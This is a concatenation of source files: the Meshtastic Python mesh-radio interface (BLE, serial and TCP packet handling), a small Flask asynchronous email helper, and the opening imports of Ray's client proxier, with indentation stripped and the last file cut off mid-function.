class KnownProtocol(NamedTuple):
"""Used to automatically decode known protocol payloads"""
name: str
# portnum: int, now a key
# If set, will be called to parse the payload as a protocol buffer
protobufFactory: Callable = None
# If set, invoked as onReceive(interface, packet)
onReceive: Callable = None
class MeshInterface:
"""Interface class for meshtastic devices
Properties:
isConnected
nodes
debugOut
"""
def __init__(self, debugOut=None, noProto=False):
"""Constructor
Keyword Arguments:
noProto -- If True, don't try to run our protocol on the link - just be a dumb serial client.
"""
self.debugOut = debugOut
self.nodes = None # FIXME
self.isConnected = threading.Event()
self.noProto = noProto
self.localNode = Node(self, -1) # We fixup nodenum later
self.myInfo = None # We don't have device info yet
self.responseHandlers = {} # A map from request ID to the handler
self.failure = None # If we've encountered a fatal exception it will be kept here
self._timeout = Timeout()
self.heartbeatTimer = None
random.seed() # FIXME, we should not clobber the random seedval here, instead tell user they must call it
self.currentPacketId = random.randint(0, 0xffffffff)
def close(self):
"""Shutdown this interface"""
if self.heartbeatTimer:
self.heartbeatTimer.cancel()
self._sendDisconnect()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is not None and exc_value is not None:
logging.error(
f'An exception of type {exc_type} with value {exc_value} has occurred')
if traceback is not None:
logging.error(f'Traceback: {traceback}')
self.close()
def showInfo(self, file=sys.stdout):
"""Show human readable summary about this object"""
owner = f"Owner: {self.getLongName()} ({self.getShortName()})"
myinfo = f"\nMy info: {stripnl(MessageToJson(self.myInfo))}"
mesh = "\nNodes in mesh:"
nodes = ""
for n in self.nodes.values():
nodes = nodes + f" {stripnl(n)}"
infos = owner + myinfo + mesh + nodes
print(infos)
return infos
def showNodes(self, includeSelf=True, file=sys.stdout):
"""Show table summary of nodes in mesh"""
def formatFloat(value, precision=2, unit=''):
return f'{value:.{precision}f}{unit}' if value else None
def getLH(ts):
return datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') if ts else None
def getTimeAgo(ts):
return timeago.format(datetime.fromtimestamp(ts), datetime.now()) if ts else None
rows = []
for node in self.nodes.values():
if not includeSelf and node['num'] == self.localNode.nodeNum:
continue
row = {"N": 0}
user = node.get('user')
if user:
row.update({
"User": user['longName'],
"AKA": user['shortName'],
"ID": user['id'],
})
pos = node.get('position')
if pos:
row.update({
"Latitude": formatFloat(pos.get("latitude"), 4, "°"),
"Longitude": formatFloat(pos.get("longitude"), 4, "°"),
"Altitude": formatFloat(pos.get("altitude"), 0, " m"),
"Battery": formatFloat(pos.get("batteryLevel"), 2, "%"),
})
row.update({
"SNR": formatFloat(node.get("snr"), 2, " dB"),
"LastHeard": getLH(node.get("lastHeard")),
"Since": getTimeAgo(node.get("lastHeard")),
})
rows.append(row)
# Why doesn't this way work?
#rows.sort(key=lambda r: r.get('LastHeard', '0000'), reverse=True)
rows.sort(key=lambda r: r.get('LastHeard') or '0000', reverse=True)
for i, row in enumerate(rows):
row['N'] = i+1
table = tabulate(rows, headers='keys', missingval='N/A',
tablefmt='fancy_grid')
print(table)
return table
def getNode(self, nodeId):
"""Return a node object which contains device settings and channel info"""
if nodeId == LOCAL_ADDR:
return self.localNode
else:
n = Node(self, nodeId)
n.requestConfig()
if not n.waitForConfig():
raise Exception("Timed out waiting for node config")
return n
def sendText(self, text: AnyStr,
destinationId=BROADCAST_ADDR,
wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None,
channelIndex=0):
"""Send a utf8 string to some other node, if the node has a display it will also be shown on the device.
Arguments:
text {string} -- The text to send
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
return self.sendData(text.encode("utf-8"), destinationId,
portNum=portnums_pb2.PortNum.TEXT_MESSAGE_APP,
wantAck=wantAck,
wantResponse=wantResponse,
hopLimit=hopLimit,
onResponse=onResponse,
channelIndex=channelIndex)
def sendData(self, data, destinationId=BROADCAST_ADDR,
portNum=portnums_pb2.PortNum.PRIVATE_APP, wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None,
channelIndex=0):
"""Send a data packet to some other node
Keyword Arguments:
data -- the data to send, either as an array of bytes or as a protobuf (which will be automatically serialized to bytes)
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
portNum -- the application portnum (similar to IP port numbers) of the destination, see portnums.proto for a list
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
onResponse -- A closure of the form funct(packet), that will be called when a response packet arrives
(or the transaction is NAKed due to non receipt)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
if getattr(data, "SerializeToString", None):
logging.debug(f"Serializing protobuf as data: {stripnl(data)}")
data = data.SerializeToString()
if len(data) > mesh_pb2.Constants.DATA_PAYLOAD_LEN:
raise Exception("Data payload too big")
if portNum == portnums_pb2.PortNum.UNKNOWN_APP: # we are now more strict wrt port numbers
raise Exception("A non-zero port number must be specified")
meshPacket = mesh_pb2.MeshPacket()
meshPacket.channel = channelIndex
meshPacket.decoded.payload = data
meshPacket.decoded.portnum = portNum
meshPacket.decoded.want_response = wantResponse
p = self._sendPacket(meshPacket, destinationId,
wantAck=wantAck, hopLimit=hopLimit)
if onResponse is not None:
self._addResponseHandler(p.id, onResponse)
return p
def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""
Send a position packet to some other node (normally a broadcast)
Also, the device software will notice this packet and use it to automatically set its notion of
the local position.
If timeSec is not specified (recommended), we will use the local machine time.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
p = mesh_pb2.Position()
if latitude != 0.0:
p.latitude_i = int(latitude / 1e-7)
if longitude != 0.0:
p.longitude_i = int(longitude / 1e-7)
if altitude != 0:
p.altitude = int(altitude)
if timeSec == 0:
timeSec = time.time() # returns unix timestamp in seconds
p.time = int(timeSec)
return self.sendData(p, destinationId,
portNum=portnums_pb2.PortNum.POSITION_APP,
wantAck=wantAck,
wantResponse=wantResponse)
def _addResponseHandler(self, requestId, callback):
self.responseHandlers[requestId] = ResponseHandler(callback)
def _sendPacket(self, meshPacket,
destinationId=BROADCAST_ADDR,
wantAck=False, hopLimit=defaultHopLimit):
"""Send a MeshPacket to the specified node (or if unspecified, broadcast).
You probably don't want this - use sendData instead.
Returns the sent packet. The id field will be populated in this packet and
can be used to track future message acks/naks.
"""
# We allow users to talk to the local node before we've completed the full connection flow...
if(self.myInfo is not None and destinationId != self.myInfo.my_node_num):
self._waitConnected()
toRadio = mesh_pb2.ToRadio()
if destinationId is None:
raise Exception("destinationId must not be None")
elif isinstance(destinationId, int):
nodeNum = destinationId
elif destinationId == BROADCAST_ADDR:
nodeNum = BROADCAST_NUM
elif destinationId == LOCAL_ADDR:
nodeNum = self.myInfo.my_node_num
# A simple hex style nodeid - we can parse this without needing the DB
elif destinationId.startswith("!"):
nodeNum = int(destinationId[1:], 16)
else:
node = self.nodes.get(destinationId)
if not node:
raise Exception(f"NodeId {destinationId} not found in DB")
nodeNum = node['num']
meshPacket.to = nodeNum
meshPacket.want_ack = wantAck
meshPacket.hop_limit = hopLimit
# if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID
# so the message can be tracked.
if meshPacket.id == 0:
meshPacket.id = self._generatePacketId()
toRadio.packet.CopyFrom(meshPacket)
#logging.debug(f"Sending packet: {stripnl(meshPacket)}")
self._sendToRadio(toRadio)
return meshPacket
def waitForConfig(self):
"""Block until radio config is received. Returns True if config has been received."""
success = self._timeout.waitForSet(self, attrs=('myInfo', 'nodes')
) and self.localNode.waitForConfig()
if not success:
raise Exception("Timed out waiting for interface config")
def getMyNodeInfo(self):
"""Get info about my node."""
if self.myInfo is None:
return None
return self.nodesByNum.get(self.myInfo.my_node_num)
def getMyUser(self):
"""Get user"""
nodeInfo = self.getMyNodeInfo()
if nodeInfo is not None:
return nodeInfo.get('user')
return None
def getLongName(self):
"""Get long name"""
user = self.getMyUser()
if user is not None:
return user.get('longName', None)
return None
def getShortName(self):
"""Get short name"""
user = self.getMyUser()
if user is not None:
return user.get('shortName', None)
return None
def _waitConnected(self):
"""Block until the initial node db download is complete, or timeout
and raise an exception"""
if not self.isConnected.wait(10.0): # timeout after 10 seconds
raise Exception("Timed out waiting for connection completion")
# If we failed while connecting, raise the failure to the client
if self.failure:
raise self.failure
def _generatePacketId(self):
"""Get a new unique packet ID"""
if self.currentPacketId is None:
raise Exception("Not connected yet, can not generate packet")
else:
self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff
return self.currentPacketId
def _disconnected(self):
"""Called by subclasses to tell clients this interface has disconnected"""
self.isConnected.clear()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.lost", interface=self))
def _startHeartbeat(self):
"""We need to send a heartbeat message to the device every X seconds"""
def callback():
self.heartbeatTimer = None
prefs = self.localNode.radioConfig.preferences
i = prefs.phone_timeout_secs / 2
logging.debug(f"Sending heartbeat, interval {i}")
if i != 0:
self.heartbeatTimer = threading.Timer(i, callback)
self.heartbeatTimer.start()
p = mesh_pb2.ToRadio()
self._sendToRadio(p)
callback() # run our periodic callback now, it will make another timer if necessary
def _connected(self):
"""Called by this class to tell clients we are now fully connected to a node
"""
# (because I'm lazy) _connected might be called when remote Node
# objects complete their config reads, don't generate redundant isConnected
# for the local interface
if not self.isConnected.is_set():
self.isConnected.set()
self._startHeartbeat()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.established", interface=self))
def _startConfig(self):
"""Start device packets flowing"""
self.myInfo = None
self.nodes = {} # nodes keyed by ID
self.nodesByNum = {} # nodes keyed by nodenum
startConfig = mesh_pb2.ToRadio()
self.configId = random.randint(0, 0xffffffff)
startConfig.want_config_id = self.configId
self._sendToRadio(startConfig)
def _sendDisconnect(self):
"""Tell device we are done using it"""
m = mesh_pb2.ToRadio()
m.disconnect = True
self._sendToRadio(m)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
if self.noProto:
logging.warning(
f"Not sending packet because protocol use is disabled by noProto")
else:
#logging.debug(f"Sending toRadio: {stripnl(toRadio)}")
self._sendToRadioImpl(toRadio)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.error(f"Subclass must provide toradio: {toRadio}")
def _handleConfigComplete(self):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings and channels
"""
self.localNode.requestConfig()
def _handleFromRadio(self, fromRadioBytes):
"""
Handle a packet that arrived from the radio(update model and publish events)
Called by subclasses."""
fromRadio = mesh_pb2.FromRadio()
fromRadio.ParseFromString(fromRadioBytes)
asDict = google.protobuf.json_format.MessageToDict(fromRadio)
#logging.debug(f"Received from radio: {fromRadio}")
if fromRadio.HasField("my_info"):
self.myInfo = fromRadio.my_info
self.localNode.nodeNum = self.myInfo.my_node_num
logging.debug(f"Received myinfo: {stripnl(fromRadio.my_info)}")
failmsg = None
# Check for app too old
if self.myInfo.min_app_version > OUR_APP_VERSION:
failmsg = "This device needs a newer python client, please \"pip install --upgrade meshtastic\". For more information see https://tinyurl.com/5bjsxu32"
# check for firmware too old
if self.myInfo.max_channels == 0:
failmsg = "This version of meshtastic-python requires device firmware version 1.2 or later. For more information see https://tinyurl.com/5bjsxu32"
if failmsg:
self.failure = Exception(failmsg)
self.isConnected.set() # let waitConnected return this exception
self.close()
elif fromRadio.HasField("node_info"):
node = asDict["nodeInfo"]
try:
self._fixupPosition(node["position"])
except:
logging.debug("Node without position")
logging.debug(f"Received nodeinfo: {node}")
self.nodesByNum[node["num"]] = node
if "user" in node: # Some nodes might not have user/ids assigned yet
self.nodes[node["user"]["id"]] = node
publishingThread.queueWork(lambda: pub.sendMessage("meshtastic.node.updated",
node=node, interface=self))
elif fromRadio.config_complete_id == self.configId:
# config_complete_id matches the id we requested, so the initial config download is finished
logging.debug(f"Config complete ID {self.configId}")
self._handleConfigComplete()
elif fromRadio.HasField("packet"):
self._handlePacketFromRadio(fromRadio.packet)
elif fromRadio.rebooted:
# Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port
MeshInterface._disconnected(self)
self._startConfig() # redownload the node db etc...
else:
logging.debug("Unexpected FromRadio payload")
def _fixupPosition(self, position):
"""Convert integer lat/lon into floats
Arguments:
position {Position dictionary} -- object to fix up
"""
if "latitudeI" in position:
position["latitude"] = position["latitudeI"] * 1e-7
if "longitudeI" in position:
position["longitude"] = position["longitudeI"] * 1e-7
def _nodeNumToId(self, num):
"""Map a node node number to a node ID
Arguments:
num {int} -- Node number
Returns:
string -- Node ID
"""
if num == BROADCAST_NUM:
return BROADCAST_ADDR
try:
return self.nodesByNum[num]["user"]["id"]
except:
logging.debug(f"Node {num} not found for fromId")
return None
def _getOrCreateByNum(self, nodeNum):
"""Given a nodenum find the NodeInfo in the DB (or create if necessary)"""
if nodeNum == BROADCAST_NUM:
raise Exception("Can not create/find nodenum by the broadcast num")
if nodeNum in self.nodesByNum:
return self.nodesByNum[nodeNum]
else:
n = {"num": nodeNum} # Create a minimial node db entry
self.nodesByNum[nodeNum] = n
return n
def _handlePacketFromRadio(self, meshPacket):
"""Handle a MeshPacket that just arrived from the radio
Will publish one of the following events:
- meshtastic.receive.text(packet = MeshPacket dictionary)
- meshtastic.receive.position(packet = MeshPacket dictionary)
- meshtastic.receive.user(packet = MeshPacket dictionary)
- meshtastic.receive.data(packet = MeshPacket dictionary)
"""
asDict = google.protobuf.json_format.MessageToDict(meshPacket)
# We normally decompose the payload into a dictionary so that the client
# doesn't need to understand protobufs. But advanced clients might
# want the raw protobuf, so we provide it in "raw"
asDict["raw"] = meshPacket
# from might be missing if the nodenum was zero.
if not "from" in asDict:
asDict["from"] = 0
logging.error(
f"Device returned a packet we sent, ignoring: {stripnl(asDict)}")
return
if not "to" in asDict:
asDict["to"] = 0
# /add fromId and toId fields based on the node ID
try:
asDict["fromId"] = self._nodeNumToId(asDict["from"])
except Exception as ex:
logging.warning(f"Not populating fromId {ex}")
try:
asDict["toId"] = self._nodeNumToId(asDict["to"])
except Exception as ex:
logging.warning(f"Not populating toId {ex}")
# We could provide our objects as DotMaps - which work with . notation or as dictionaries
# asObj = DotMap(asDict)
topic = "meshtastic.receive" # Generic unknown packet type
decoded = asDict["decoded"]
# The default MessageToDict converts byte arrays into base64 strings.
# We don't want that - it messes up data payload. So slam in the correct
# byte array.
decoded["payload"] = meshPacket.decoded.payload
# UNKNOWN_APP is the default protobuf portnum value, and therefore if not set it will not be populated at all
# to make API usage easier, set it to prevent confusion
if not "portnum" in decoded:
decoded["portnum"] = portnums_pb2.PortNum.Name(
portnums_pb2.PortNum.UNKNOWN_APP)
portnum = decoded["portnum"]
topic = f"meshtastic.receive.data.{portnum}"
# decode position protobufs and update nodedb, provide decoded version as "position" in the published msg
# move the following into a 'decoders' API that clients could register?
portNumInt = meshPacket.decoded.portnum # we want portnum as an int
handler = protocols.get(portNumInt)
# The decoded protobuf as a dictionary (if we understand this message)
p = None
if handler is not None:
topic = f"meshtastic.receive.{handler.name}"
# Convert to protobuf if possible
if handler.protobufFactory is not None:
pb = handler.protobufFactory()
pb.ParseFromString(meshPacket.decoded.payload)
p = google.protobuf.json_format.MessageToDict(pb)
asDict["decoded"][handler.name] = p
# Also provide the protobuf raw
asDict["decoded"][handler.name]["raw"] = pb
# Call specialized onReceive if necessary
if handler.onReceive is not None:
handler.onReceive(self, asDict)
# Is this message in response to a request, if so, look for a handler
requestId = decoded.get("requestId")
if requestId is not None:
# We ignore ACK packets, but send NAKs and data responses to the handlers
routing = decoded.get("routing")
isAck = routing is not None and ("errorReason" not in routing)
if not isAck:
# we keep the responseHandler in dict until we get a non ack
handler = self.responseHandlers.pop(requestId, None)
if handler is not None:
handler.callback(asDict)
logging.debug(f"Publishing {topic}: packet={stripnl(asDict)} ")
publishingThread.queueWork(lambda: pub.sendMessage(
topic, packet=asDict, interface=self))
# Our standard BLE characteristics
TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7"
FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5"
FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453"
class BLEInterface(MeshInterface):
"""A not quite ready - FIXME - BLE interface to devices"""
def __init__(self, address, debugOut=None):
self.address = address
self.adapter = pygatt.GATTToolBackend() # BGAPIBackend()
self.adapter.start()
logging.debug(f"Connecting to {self.address}")
self.device = self.adapter.connect(address)
logging.debug("Connected to device")
# fromradio = self.device.char_read(FROMRADIO_UUID)
MeshInterface.__init__(self, debugOut=debugOut)
self._readFromRadio() # read the initial responses
def handle_data(handle, data):
self._handleFromRadio(data)
self.device.subscribe(FROMNUM_UUID, callback=handle_data)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
#logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
self.device.char_write(TORADIO_UUID, b)
def close(self):
MeshInterface.close(self)
self.adapter.stop()
def _readFromRadio(self):
wasEmpty = False
while not wasEmpty:
b = self.device.char_read(FROMRADIO_UUID)
wasEmpty = len(b) == 0
if not wasEmpty:
self._handleFromRadio(b)
class StreamInterface(MeshInterface):
"""Interface class for meshtastic devices over a stream link (serial, TCP, etc)"""
def __init__(self, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to self.stream
Keyword Arguments:
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
noProto {bool} -- If True, don't run our protocol on the link - just be a dumb serial client. (default: {False})
connectNow {bool} -- If True, connect to the device immediately and start reading. (default: {True})
"""
if not hasattr(self, 'stream'):
raise Exception(
"StreamInterface is now abstract (to update existing code create SerialInterface instead)")
self._rxBuf = bytes() # empty
self._wantExit = False
# FIXME, figure out why daemon=True causes reader thread to exit too early
self._rxThread = threading.Thread(
target=self.__reader, args=(), daemon=True)
MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto)
# Start the reader thread after superclass constructor completes init
if connectNow:
self.connect()
if not noProto:
self.waitForConfig()
def connect(self):
"""Connect to our radio
Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually
start the reading thread later.
"""
# Send some bogus UART characters to force a sleeping device to wake, and if the reading state machine was parsing a bad packet make sure
# we write enough start bytes to force it to resync (we don't use START1 because we want to ensure it is looking for START1)
p = bytearray([START2] * 32)
self._writeBytes(p)
time.sleep(0.1) # wait 100ms to give device time to start running
self._rxThread.start()
self._startConfig()
if not self.noProto: # Wait for the db download if using the protocol
self._waitConnected()
def _disconnected(self):
"""We override the superclass implementation to close our port"""
MeshInterface._disconnected(self)
logging.debug("Closing our port")
if not self.stream is None:
self.stream.close()
self.stream = None
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
if self.stream: # ignore writes when stream is closed
self.stream.write(b)
self.stream.flush()
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.stream.read(len)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
bufLen = len(b)
# We convert into a string, because the TCP code doesn't work with byte arrays
header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff])
self._writeBytes(header + b)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing stream")
MeshInterface.close(self)
# pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us
self._wantExit = True
if self._rxThread != threading.current_thread():
self._rxThread.join() # wait for it to exit
def __reader(self):
"""The reader thread that reads bytes from our stream"""
empty = bytes()
try:
while not self._wantExit:
# logging.debug("reading character")
b = self._readBytes(1)
# logging.debug("In reader loop")
# logging.debug(f"read returned {b}")
if len(b) > 0:
c = b[0]
ptr = len(self._rxBuf)
# Assume we want to append this byte, fixme use bytearray instead
self._rxBuf = self._rxBuf + b
if ptr == 0: # looking for START1
if c != START1:
self._rxBuf = empty # failed to find start
if self.debugOut != None:
try:
self.debugOut.write(b.decode("utf-8"))
except:
self.debugOut.write('?')
elif ptr == 1: # looking for START2
if c != START2:
self._rxBuf = empty # failed to find start2
elif ptr >= HEADER_LEN - 1: # we've at least got a header
# big endian length follows the header
packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]
if ptr == HEADER_LEN - 1: # we _just_ finished reading the header, validate length
if packetlen > MAX_TO_FROM_RADIO_SIZE:
self._rxBuf = empty # length was out of bounds, restart
if len(self._rxBuf) != 0 and ptr + 1 >= packetlen + HEADER_LEN:
try:
self._handleFromRadio(self._rxBuf[HEADER_LEN:])
except Exception as ex:
logging.error(
f"Error while handling message from radio {ex}")
traceback.print_exc()
self._rxBuf = empty
else:
# logging.debug(f"timeout")
pass
except serial.SerialException as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.warning(
f"Meshtastic serial port disconnected, disconnecting... {ex}")
except OSError as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.error(
f"Unexpected OSError, terminating meshtastic reader... {ex}")
except Exception as ex:
logging.error(
f"Unexpected exception, terminating meshtastic reader... {ex}")
finally:
logging.debug("reader is exiting")
self._disconnected()
class SerialInterface(StreamInterface):
"""Interface class for meshtastic devices over a serial link"""
def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to a specified serial port, or if unspecified try to
find one Meshtastic device by probing
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
"""
if devPath is None:
ports = util.findPorts()
if len(ports) == 0:
raise Exception("No Meshtastic devices detected")
elif len(ports) > 1:
raise Exception(
f"Multiple ports detected, you must specify a device, such as {ports[0]}")
else:
devPath = ports[0]
logging.debug(f"Connecting to {devPath}")
# Note: we provide None for port here, because we will be opening it later
self.stream = serial.Serial(
None, 921600, exclusive=True, timeout=0.5, write_timeout=0)
# rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset
self.stream.port = devPath
# HACK: If the platform driving the serial port is unable to leave the RTS pin in high-impedance
# mode, set RTS to false so that the device platform won't be reset spuriously.
# Linux does this properly, so don't apply this hack on Linux (because it makes the reset button not work).
if self._hostPlatformAlwaysDrivesUartRts():
self.stream.rts = False
self.stream.open()
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
"""true if platform driving the serial port is Windows Subsystem for Linux 1."""
def _isWsl1(self):
# WSL1 identifies itself as Linux, but has a special char device at /dev/lxss for use with session control,
# e.g. /init. We should treat WSL1 as Windows for the RTS-driving hack because the underlying platfrom
# serial driver for the CP21xx still exhibits the buggy behavior.
# WSL2 is not covered here, as it does not (as of 2021-May-25) support the appropriate functionality to
# share or pass-through serial ports.
try:
# Claims to be Linux, but has /dev/lxss; must be WSL 1
return platform.system() == 'Linux' and stat.S_ISCHR(os.stat('/dev/lxss').st_mode)
except:
# Couldn't stat /dev/lxss special device; not WSL1
return False
def _hostPlatformAlwaysDrivesUartRts(self):
# OS-X/Windows seems to have a bug in its CP21xx serial drivers. It ignores that we asked for no RTSCTS
# control and will always drive RTS either high or low (rather than letting the CP102 leave
# it as an open-collector floating pin).
# TODO: When WSL2 supports USB passthrough, this will get messier. If/when WSL2 gets virtual serial
# ports that "share" the Windows serial port (and thus the Windows drivers), this code will need to be
# updated to reflect that as well -- or if T-Beams get made with an alternate USB to UART bridge that has
# a less buggy driver.
return platform.system() != 'Linux' or self._isWsl1()
class TCPInterface(StreamInterface):
"""Interface class for meshtastic devices over a TCP link"""
def __init__(self, hostname: AnyStr, debugOut=None, noProto=False, connectNow=True, portNumber=4403):
"""Constructor, opens a connection to a specified IP address/hostname
Keyword Arguments:
hostname {string} -- Hostname/IP address of the device to connect to
"""
logging.debug(f"Connecting to {hostname}")
server_address = (hostname, portNumber)
sock = socket.create_connection(server_address)
# Instead of wrapping as a stream, we use the native socket API
# self.stream = sock.makefile('rw')
self.stream = None
self.socket = sock
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing TCP stream")
StreamInterface.close(self)
# Sometimes the socket read might be blocked in the reader thread. Therefore we force the shutdown by closing
# the socket here
self._wantExit = True
if not self.socket is None:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass # Ignore errors in shutdown, because we might have a race with the server
self.socket.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.socket.send(b)
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.socket.recv(len)
def _onTextReceive(iface, asDict):
"""Special text auto parsing for received messages"""
# We don't throw if the utf8 is invalid in the text message. Instead we just don't populate
# the decoded.data.text and we log an error message. This at least allows some delivery to
# the app and the app can deal with the missing decoded representation.
#
# Usually btw this problem is caused by apps sending binary data but setting the payload type to
# text.
try:
asBytes = asDict["decoded"]["payload"]
asDict["decoded"]["text"] = asBytes.decode("utf-8")
except Exception as ex:
logging.error(f"Malformatted utf8 in text message: {ex}")
_receiveInfoUpdate(iface, asDict)
def _onPositionReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["position"]
iface._fixupPosition(p)
# update node DB as needed
iface._getOrCreateByNum(asDict["from"])["position"] = p
def _onNodeInfoReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["user"]
# decode user protobufs and update nodedb, provide decoded version as "position" in the published msg
# update node DB as needed
n = iface._getOrCreateByNum(asDict["from"])
n["user"] = p
# We now have a node ID, make sure it is uptodate in that table
iface.nodes[p["id"]] = n
_receiveInfoUpdate(iface, asDict)
def _receiveInfoUpdate(iface, asDict):
iface._getOrCreateByNum(asDict["from"])["lastReceived"] = asDict
iface._getOrCreateByNum(asDict["from"])["lastHeard"] = asDict.get("rxTime")
iface._getOrCreateByNum(asDict["from"])["snr"] = asDict.get("rxSnr")
iface._getOrCreateByNum(asDict["from"])["hopLimit"] = asDict.get("hopLimit")
"""Well known message payloads can register decoders for automatic protobuf parsing"""
protocols = {
portnums_pb2.PortNum.TEXT_MESSAGE_APP: KnownProtocol("text", onReceive=_onTextReceive),
portnums_pb2.PortNum.POSITION_APP: KnownProtocol("position", mesh_pb2.Position, _onPositionReceive),
portnums_pb2.PortNum.NODEINFO_APP: KnownProtocol("user", mesh_pb2.User, _onNodeInfoReceive),
portnums_pb2.PortNum.ADMIN_APP: KnownProtocol("admin", admin_pb2.AdminMessage),
portnums_pb2.PortNum.ROUTING_APP: KnownProtocol("routing", mesh_pb2.Routing),
portnums_pb2.PortNum.ENVIRONMENTAL_MEASUREMENT_APP: KnownProtocol("environmental", environmental_measurement_pb2.EnvironmentalMeasurement),
portnums_pb2.PortNum.REMOTE_HARDWARE_APP: KnownProtocol(
"remotehw", remote_hardware_pb2.HardwareMessage)
}
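# A hedged sketch (not part of the library itself): application code could register its own
# decoder for a private portnum so that matching payloads are auto-parsed before being published.
# "MyAppMessage" is a hypothetical protobuf message class supplied by the application:
#
#   protocols[portnums_pb2.PortNum.PRIVATE_APP] = KnownProtocol(
#       "myapp", protobufFactory=MyAppMessage,
#       onReceive=lambda iface, packet: logging.debug(packet["decoded"]["myapp"]))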
|
email.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : email.py
# @Author : Hython
# @Date   : 2020/01/14 22:51 (CE)
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
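# A hedged usage sketch (the template name and variables are hypothetical):
#
#   send_email(user.email, 'Confirm Your Account',
#              'auth/email/confirm', user=user, token=token)
#
# The template name is rendered as both 'auth/email/confirm.txt' and 'auth/email/confirm.html'.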
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
from ray._raylet import connect_to_gcs
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.client_mode_hook import disable_client_hook
from ray._private.parameter import RayParams
from ray._private.runtime_env import RuntimeEnvContext
import ray._private.runtime_env.working_dir as working_dir_pkg
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 30
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
